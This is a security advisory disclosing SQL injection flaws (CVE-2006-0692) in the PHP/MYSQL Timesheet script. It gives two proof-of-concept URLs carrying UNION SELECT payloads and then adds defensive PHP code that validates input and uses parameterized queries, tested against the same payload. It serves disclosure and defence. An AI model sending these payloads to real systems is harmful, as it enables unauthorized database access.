Multiple SQL Injection in PHP/MYSQL Timesheet

Summary

Vulnerability: Multiple SQL Injection in PHP/MYSQL Timesheet
Discovered: 2006.02.07
Last Update: 2006.02.17 Exploitation code published
ID: EV0067
CVE: CVE-2006-0692
Risk Level: medium
Type: SQL Injection
Status: Unpatched. No reply from developer(s)
Vendor: n/a
Vulnerable Software: PHP/MYSQL Timesheet (http://www.geocities.com/night247/)
Version: V1, V2
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL injection was found in the PHP/MYSQL Timesheet (http://www.geocities.com/night247/) script.

Vulnerable scripts:
index.php
changehrs.php


The variables $yr, $month, $day and $job are not properly sanitized before being used in an SQL query. This allows arbitrary SQL code to be injected, so any SQL query can be made.

Condition: magic_quotes_gpc - off

PoC/Exploit

SQL Injection Examples:

http://host/timesheet/index.php?j=composites&m=03&y=1'%20union%20select%201,2,3,4,5/*

http://host/timesheet/changehrs.php?edit=1&m=1'%20union%20select%201,2,3,4,5,'Vulnerable',7/*

Solution

Solution for "Multiple SQL Injection in PHP/MYSQL Timesheet" is not available. Check vendor's website for updates.
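
One way to close the injection described above is strict validation of the four values plus a parameterized query. This is an added example, not part of the original advisory and not Timesheet's own code. The table and column names, the 'd' parameter, the job-name alphabet and the use of PDO with an in-memory SQLite database (so it runs offline) are assumptions.

```php
<?php
// Added example: table/column names and the 'd' parameter are assumptions;
// 'j', 'm' and 'y' are the parameter names seen in the advisory's URLs.
function validate_params(array $in): array
{
    $int = function (string $key, int $min, int $max) use ($in): int {
        $raw = $in[$key] ?? '';
        // Digits only (\A...\z rejects a trailing newline), then a range check.
        $v = (is_string($raw) && preg_match('/\A\d{1,4}\z/', $raw)) ? (int) $raw : -1;
        if ($v < $min || $v > $max) {
            throw new InvalidArgumentException("{$key}: expected integer {$min}-{$max}");
        }
        return $v;
    };
    $job = $in['j'] ?? '';
    // Assumed job-name alphabet; adjust to the names actually in use.
    if (!is_string($job) || !preg_match('/\A[A-Za-z0-9_ -]{1,64}\z/', $job)) {
        throw new InvalidArgumentException('j: invalid job name');
    }
    return [':y' => $int('y', 1970, 2100), ':m' => $int('m', 1, 12),
            ':d' => $int('d', 1, 31), ':j' => $job];
}

// Values are bound as parameters, never concatenated into the SQL text.
function fetch_hours(PDO $db, array $bound): array
{
    $stmt = $db->prepare('SELECT hours FROM timesheet
        WHERE yr = :y AND month_no = :m AND day_no = :d AND job = :j');
    $stmt->execute($bound);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed demo data in an in-memory SQLite database, so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE timesheet (yr INT, month_no INT, day_no INT, job TEXT, hours REAL)');
$db->exec("INSERT INTO timesheet VALUES (2006, 3, 1, 'composites', 7.5)");
$requests = [ // constructed: a normal request, then the advisory's index.php payload in y
    ['j' => 'composites', 'm' => '03', 'y' => '2006', 'd' => '1'],
    ['j' => 'composites', 'm' => '03', 'y' => "1' union select 1,2,3,4,5/*", 'd' => '1'],
];
foreach ($requests as $get) {
    try {
        echo json_encode(fetch_hours($db, validate_params($get))), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected (', $e->getMessage(), ")\n";
    }
}
```

Unlike magic_quotes_gpc, this does not depend on a server-wide setting: the numeric fields are rejected unless they are plain digits in range, and the job name reaches the database only as a bound parameter.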